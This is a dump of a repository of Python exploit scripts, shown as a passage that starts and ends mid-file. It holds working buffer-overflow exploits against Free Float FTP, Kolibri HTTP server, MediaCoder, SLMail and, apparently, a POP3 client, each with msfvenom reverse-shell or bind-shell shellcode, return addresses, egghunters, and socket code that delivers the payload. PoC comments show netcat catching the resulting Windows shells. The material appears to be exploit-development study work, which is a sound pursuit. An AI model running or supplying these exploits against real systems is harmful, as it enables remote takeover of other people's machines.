"\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 77 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 78 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 79 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 80 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 81 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 82 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 83 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 84 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 85 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 86 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 87 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 88 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 89 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 90 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 91 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 92 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 93 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 94 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 95 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 96 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 97 | shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 98 | shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 99 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 100 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 101 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 102 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 103 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 104 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 105 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 106 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 107 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 108 | shellcode += "\x45\x41\x41" 109 | 110 | buff = "\x41"*713 + "\x27\xb2\xfa\x77" + "\x90"*100 + egghunter + "r4f4r4f4" + shellcode 111 | 112 | sploit = "-ERR " + buff 113 | 114 | try: 115 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 116 | s.bind(('', 110)) 117 | s.listen(1) 118 | print ("[*] Listening on port 110.") 119 | print ("[*] Have someone connect to you.") 120 | print ("[*] Type -c to exit.") 121 | conn, addr = s.accept() 122 | print '[*] Received connection from: ', addr 123 | 124 | while 1: 125 | conn.send(sploit) 126 | conn.close() 127 | except: 128 | print ("[*] Done.") 129 | -------------------------------------------------------------------------------- /exploit-freefloatftp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # July 2017 | github.com/rafaveira3 4 | # 5 | # Exploit Free Float FTP - 'MKD' Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - 1 Kali attacking machine and 1 Windows XP (Metasploitable will do) in the same local host network using virtualbox. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # http://www.exploit-db.com/wp-content/themes/exploit/applications/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip 11 | # - Just run the binary and the service will be running 12 | # - pattern_create.rb and pattern_offset.rb = 247 13 | # - Bachars = \x00\x0a\x0d 14 | # - Return Address found at 0x7ca58265 (JMP ESP) | SHELL32.dll 15 | # - Generated the payload using msfvenom 16 | # 17 | # PoC: 18 | # terminal 1 19 | # root@kali: python exploit-freefloatftp.py 20 | # terminal 2 21 | # root@kali:~# nc -nlvp 443 22 | # listening on [any] 443 ... 23 | # connect to [10.0.0.36] from (UNKNOWN) [10.0.0.44] 1047 24 | # Microsoft Windows XP [vers�o 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\Joe\Meus documentos> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | import sys 36 | 37 | eip = "\x65\x82\xa5\x7c" 38 | nops = "\x90"*20 39 | 40 | # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.0.36 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" 41 | #Payload size: 351 bytes 42 | 43 | shellcode = ("\xd9\xc1\xd9\x74\x24\xf4\x5a\xbe\x6a\x9f\x74\x89\x29\xc9\xb1" 44 | "\x52\x83\xea\xfc\x31\x72\x13\x03\x18\x8c\x96\x7c\x20\x5a\xd4" 45 | "\x7f\xd8\x9b\xb9\xf6\x3d\xaa\xf9\x6d\x36\x9d\xc9\xe6\x1a\x12" 46 | "\xa1\xab\x8e\xa1\xc7\x63\xa1\x02\x6d\x52\x8c\x93\xde\xa6\x8f" 47 | "\x17\x1d\xfb\x6f\x29\xee\x0e\x6e\x6e\x13\xe2\x22\x27\x5f\x51" 48 | "\xd2\x4c\x15\x6a\x59\x1e\xbb\xea\xbe\xd7\xba\xdb\x11\x63\xe5" 49 | "\xfb\x90\xa0\x9d\xb5\x8a\xa5\x98\x0c\x21\x1d\x56\x8f\xe3\x6f" 50 | "\x97\x3c\xca\x5f\x6a\x3c\x0b\x67\x95\x4b\x65\x9b\x28\x4c\xb2" 51 | "\xe1\xf6\xd9\x20\x41\x7c\x79\x8c\x73\x51\x1c\x47\x7f\x1e\x6a" 52 | "\x0f\x9c\xa1\xbf\x24\x98\x2a\x3e\xea\x28\x68\x65\x2e\x70\x2a" 53 | "\x04\x77\xdc\x9d\x39\x67\xbf\x42\x9c\xec\x52\x96\xad\xaf\x3a" 54 | "\x5b\x9c\x4f\xbb\xf3\x97\x3c\x89\x5c\x0c\xaa\xa1\x15\x8a\x2d" 55 | "\xc5\x0f\x6a\xa1\x38\xb0\x8b\xe8\xfe\xe4\xdb\x82\xd7\x84\xb7" 56 | "\x52\xd7\x50\x17\x02\x77\x0b\xd8\xf2\x37\xfb\xb0\x18\xb8\x24" 57 | "\xa0\x23\x12\x4d\x4b\xde\xf5\x78\x8c\xe0\x21\x15\x8e\xe0\x28" 58 | "\x5e\x07\x06\x40\xb0\x4e\x91\xfd\x29\xcb\x69\x9f\xb6\xc1\x14" 59 | "\x9f\x3d\xe6\xe9\x6e\xb6\x83\xf9\x07\x36\xde\xa3\x8e\x49\xf4" 60 | "\xcb\x4d\xdb\x93\x0b\x1b\xc0\x0b\x5c\x4c\x36\x42\x08\x60\x61" 61 | "\xfc\x2e\x79\xf7\xc7\xea\xa6\xc4\xc6\xf3\x2b\x70\xed\xe3\xf5" 62 | "\x79\xa9\x57\xaa\x2f\x67\x01\x0c\x86\xc9\xfb\xc6\x75\x80\x6b" 63 | "\x9e\xb5\x13\xed\x9f\x93\xe5\x11\x11\x4a\xb0\x2e\x9e\x1a\x34" 64 | "\x57\xc2\xba\xbb\x82\x46\xca\xf1\x8e\xef\x43\x5c\x5b\xb2\x09" 65 | "\x5f\xb6\xf1\x37\xdc\x32\x8a\xc3\xfc\x37\x8f\x88\xba\xa4\xfd" 66 | "\x81\x2e\xca\x52\xa1\x7a") 67 | 68 | buffer = "A"*247 + eip + nops + shellcode + "C"*(1000-247-4-20-351) 69 | 70 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 71 | connect=s.connect(('10.0.0.44',21)) 72 | 73 | s.recv(1024) 74 | s.send('USER anonymous\r\n') 75 | s.recv(1024) 76 | s.send('PASS anonymous\r\n') 77 | s.recv(1024) 78 | s.send('MKD ' + buffer + '\r\n') 79 | s.recv(1024) 80 | s.send('QUIT\r\n') 81 | s.close 82 | -------------------------------------------------------------------------------- /exploit-kolibri.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # Exploit Kolibri v2.0 HTTP Server (Using Egghunter) 6 | # 7 | # Thanks to FuzzySecurity for this great reference: 8 | # http://www.fuzzysecurity.com/tutorials/expDev/4.html 9 | # 10 | # How I tested it: 11 | # - Windows XP SP3 and Kali. 12 | # - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 13 | # - https://www.exploit-db.com/apps/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip 14 | # 15 | # Development Proccess: 16 | # - https://medium.com/@rafaveira3/exploit-development-kolibri-v2-0-http-server-egg-hunter-example-1-5e435aa84879 17 | # 18 | # PoC: 19 | # Windows XP: 20 | # - Open Kolibri and press "Start" to start listening on port 8080 21 | # - Open cmd and type "netstat -ano | find ":4444" 22 | # Kali: 23 | # root@kali:~# python exploit-kolibri.py 24 | # root@kali:~# 25 | # root@kali:~# nc -nv 10.10.0.20 4444 26 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 27 | # Microsoft Windows XP [Version 5.1.2600] 28 | # (C) Copyright 1985-2001 Microsoft Corp. 29 | # 30 | # C:\Documents and Settings\rafael\Desktop\WORK\kolibri2> 31 | # 32 | # 33 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 34 | # Accessing a computer system or network without authorization or explicit permission is illegal. 35 | # 36 | # INFOS: 37 | # - pattern_create.rb + pattern_offset.rb = 515 38 | # - Return Address found at 0x71A91C8B (JMP ESP) | wshtcpip.dll 39 | # - short jmp 50 bytes back opcode: \xEB\xCE 40 | # - generated egghunter using mona scripts (Egg = r4f4) 41 | # - Generated shellcode using msfvenom 42 | 43 | import socket 44 | import os 45 | import sys 46 | 47 | # 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34 48 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 49 | 50 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 51 | # Size = 718 bytes 52 | shellcode = "" 53 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 54 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 55 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 56 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 57 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 58 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 59 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 60 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 61 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 62 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 63 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 64 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 65 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 66 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 67 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 68 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 69 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 70 | shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 71 | shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 72 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 73 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 74 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 75 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 76 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 77 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 78 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 79 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 80 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 81 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 82 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 83 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 84 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 85 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 86 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 87 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 88 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 89 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 90 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 91 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 92 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 93 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 94 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 95 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 96 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 97 | shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 98 | shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 99 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 100 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 101 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 102 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 103 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 104 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 105 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 106 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 107 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 108 | shellcode += "\x45\x41\x41" 109 | 110 | Stage1 = "A"*478 + egghunter + "A"*5 + "\x8B\x1C\xA9\x71" + "\xEB\xCE" 111 | Stage2 = "r4f4r4f4" + shellcode 112 | 113 | buffer = ( 114 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 115 | "Host: 10.10.0.20:8080\r\n" 116 | "User-Agent: " + Stage2 + "\r\n" 117 | "Keep-Alive: 115\r\n" 118 | "Connection: keep-alive\r\n\r\n") 119 | 120 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 121 | expl.connect(("10.10.0.20", 8080)) 122 | expl.send(buffer) 123 | expl.close() 124 | -------------------------------------------------------------------------------- /exploit-mediacoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH) (Using Egghunter) 6 | # 7 | # How I tested it: 8 | # - Windows XP SP3 and Kali. 9 | # - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - https://www.exploit-db.com/apps/88879396a7103d9a401d05f5cec9bcae-MediaCoder-0.8.48.5888.exe 11 | # 12 | # PoC: 13 | # Windows XP: 14 | # - Install MediaCoder 0.8.48.5888 (next -> next -> finish) 15 | # C:\Python27>python.exe exploit-mediacoder.py 16 | # Exploit has been created! 17 | # C:\Python27> 18 | # - Open cmd.exe and type : netstat -ano | find ":4444" 19 | # - Right click exploit.m3u -> Open With... MediaCoder 20 | # Kali: 21 | # root@kali:~# nc -nv 10.10.0.20 4444 22 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 23 | # Microsoft Windows XP [Version 5.1.2600] 24 | # (C) Copyright 1985-2001 Microsoft Corp. 25 | # 26 | # C:\Program Files\MediaCoder> 27 | # 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # Infos: 33 | # - pattern_create + pattern_offset= = 365 34 | # - pop pop ret found using mona at 0x64f010b2 of swscale-3.dll (SafeSEH:False) 35 | # - short jmp 54 bytes back opcode: \xEB\xCA 36 | # - egghunter generated with mona (egg r4f4) 37 | # - shellcode generated with msfvenom 38 | 39 | from struct import pack 40 | 41 | jmp = "\xEB\xCA" 42 | 43 | # Size 32 Bytes 44 | # Egg = r4f4 45 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 46 | 47 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 48 | # Size = 718 bytes 49 | shellcode = "" 50 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 51 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 52 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 53 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 54 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 55 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 56 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 57 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 58 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 59 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 60 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 61 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 62 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 63 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 64 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 65 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 66 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 67 | shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 68 | shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 69 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 70 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 71 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 72 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 73 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 74 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 75 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 76 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 77 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 78 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 79 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 80 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 81 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 82 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 83 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 84 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 85 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 86 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 87 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 88 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 89 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 90 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 91 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 92 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 93 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 94 | shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 95 | shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 96 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 97 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 98 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 99 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 100 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 101 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 102 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 103 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 104 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 105 | shellcode += "\x45\x41\x41" 106 | 107 | # buf = junk + nSEH + SEH + junk 108 | junk = "http://" + "A"*309 + "\x90"*10 + egghunter + "\x90"*10 + "B"*2 + jmp + "\xb2\x10\xf0\x64" + "r4f4r4f4" + shellcode 109 | 110 | exploit = junk 111 | 112 | try: 113 | file= open("exploit.m3u",'w') 114 | file.write(exploit) 115 | file.close() 116 | raw_input("\nExploit has been created!\n") 117 | except: 118 | print "There has been an Error" 119 | -------------------------------------------------------------------------------- /exploit-slmail.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # July 2017 | github.com/rafaveira3 4 | # 5 | # Exploit SLMail - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - 1 Kali attacking machine and 1 Windows XP (Metasploitable will do) in the same local host network using virtualbox. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe 11 | # - Intallation Guide: Next, Next, Next, ... , Next, Finish 12 | # - pattern_create.rb and pattern_offset.rb = 2606 13 | # - Bachars = \x00\x0a\x0d 14 | # - Return Address found at 5F4A358F (JMP ESP) 15 | # - Generated the payload using msfvenom 16 | # 17 | # PoC: 18 | # terminal 1 19 | # root@kali: python exploit-smail.py 20 | # terminal 2 21 | # root@kali: nc -nlvp 443 22 | # listening on [any] 443 ... 23 | # connect to [10.10.0.20] from (UNKNOWN) [10.10.0.21] 1035 24 | # Microsoft Windows XP [vers�o 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Arquivos de programas\SLmail\System> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | 37 | jmpESP = "\x8f\x35\x4a\x5f" 38 | nop = "\x90"*16 39 | 40 | # 41 | # msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.0.20 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" 42 | # Payload size: 351 bytes 43 | 44 | shellcode = ("\xbf\xbc\xfc\x4b\xdd\xdb\xd5\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 45 | "\x52\x31\x7a\x12\x03\x7a\x12\x83\x7e\xf8\xa9\x28\x82\xe9\xac" 46 | "\xd3\x7a\xea\xd0\x5a\x9f\xdb\xd0\x39\xd4\x4c\xe1\x4a\xb8\x60" 47 | "\x8a\x1f\x28\xf2\xfe\xb7\x5f\xb3\xb5\xe1\x6e\x44\xe5\xd2\xf1" 48 | "\xc6\xf4\x06\xd1\xf7\x36\x5b\x10\x3f\x2a\x96\x40\xe8\x20\x05" 49 | "\x74\x9d\x7d\x96\xff\xed\x90\x9e\x1c\xa5\x93\x8f\xb3\xbd\xcd" 50 | "\x0f\x32\x11\x66\x06\x2c\x76\x43\xd0\xc7\x4c\x3f\xe3\x01\x9d" 51 | "\xc0\x48\x6c\x11\x33\x90\xa9\x96\xac\xe7\xc3\xe4\x51\xf0\x10" 52 | "\x96\x8d\x75\x82\x30\x45\x2d\x6e\xc0\x8a\xa8\xe5\xce\x67\xbe" 53 | "\xa1\xd2\x76\x13\xda\xef\xf3\x92\x0c\x66\x47\xb1\x88\x22\x13" 54 | "\xd8\x89\x8e\xf2\xe5\xc9\x70\xaa\x43\x82\x9d\xbf\xf9\xc9\xc9" 55 | "\x0c\x30\xf1\x09\x1b\x43\x82\x3b\x84\xff\x0c\x70\x4d\x26\xcb" 56 | "\x77\x64\x9e\x43\x86\x87\xdf\x4a\x4d\xd3\x8f\xe4\x64\x5c\x44" 57 